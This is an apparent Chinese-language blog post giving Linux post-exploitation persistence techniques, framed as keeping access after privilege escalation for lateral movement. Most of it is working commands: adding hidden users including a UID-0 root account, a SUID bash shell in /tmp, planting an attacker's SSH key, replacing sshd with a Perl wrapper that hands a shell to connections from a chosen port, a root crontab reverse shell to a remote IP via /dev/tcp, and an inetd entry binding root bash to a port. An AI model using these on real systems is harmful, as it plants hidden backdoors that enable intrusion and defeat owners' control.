Linux 後門權限持
作者 : Noth
前言 :
滲透拿到主機權限並提權成功後,接下來就是要進行維持權限 xD 可以方便進入系統中,在進一步進行橫向擴散。
內文 :
1. 一句話添加用戶/密碼 :
添加普通用戶 :
用户名 : guest,密碼 : 1qaz@WSX
useradd -p `openssl passwd -1 -salt 'salt' 1qaz@WSX` guest
useradd -p 方法("$()"也可以存放命令執行語句) :
添加普通用戶 :
useradd -p "$(openssl passwd -1 123456)" noth
切換帳戶 :
su noth
chpasswd 方法 :
添加普通用戶 :
useradd guest;echo 'noth$:123456'|chpasswd
切換帳戶 :
su noth$
echo -e 方法 :
添加普通用戶 :
useradd test;echo -e "123456\n123456\n" |passwd test
切換帳戶 :
su test
添加 root用户 :
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
切換帳戶 :
su guest
2. SUID Shell
root 用戶 :
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell
普通用戶 :
/tmp/shell -p
3. ssh 公私鑰免密登入
https://segmentfault.com/a/1190000024575872
在 attack 上生成一對公私鑰,然後把公鑰放到 victim 上 (~/.ssh/authorized_keys),attack 保留私鑰,當 ssh 登入時,ssh 程序會發送私鑰去和服務器上的公鑰做匹配,如果匹配成功就可以登入了。
前提 :
victim 有開 22 port , 知道一般 user 或 root 帳戶的密碼
實作環境 :
attack : 192.168.179.144 , kali
victim : 192.168.179.146 , ubuntu
attack 生成公私鑰 :
ssh-keygen -t rsa
將 attack's id_rsa.pub 傳到 victim's /root/.ssh/authorized_keys :
ssh-copy-id -i ~/.ssh/id_rsa.pub ubuntu@192.168.179.146
ssh 登入主機 :
ssh ubuntu@192.168.179.146
ssh -p 22 -i ~/.ssh/id_rsa ubuntu@192.168.179.146
4. 軟連接 (待繼續)
https://blog.csdn.net/weixin_40412037/article/details/117447832
5. SSH wrapper
victim :
cd /usr/sbin/
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart
attack :
socat STDIO TCP4:192.168.86.185:22,sourceport=13377
6. crontab
設置周期性被執行的指令,新建shell腳本,利用腳本進行反彈
victim :
在 /tmp 目錄添加 reverse.sh 腳本
#!/bin/bash
bash -i >& /dev/tcp/192.168.86.192/12345 0>&1
授予權限 :
chmod +sx /tmp/reverse.sh
設置 crontab :
vim /etc/crontab
*/1 * * * * root /tmp/reverse.sh
重啟 crontab 服務 :
service cron restart
attack :
nc -lvvp 12345
6. inetd
https://blog.csdn.net/d_0xff/article/details/51521075
前提 :
victim 有開啟 telnet/23 Port 服務
環境配置
victim :
先安裝
apt-get install telnetd
victim :
修改 /etc/inetd.conf
添加 daytime stream tcp nowait root /bin/bash bash -i
attack :
nc -vv 192.168.86.185 13
留言
張貼留言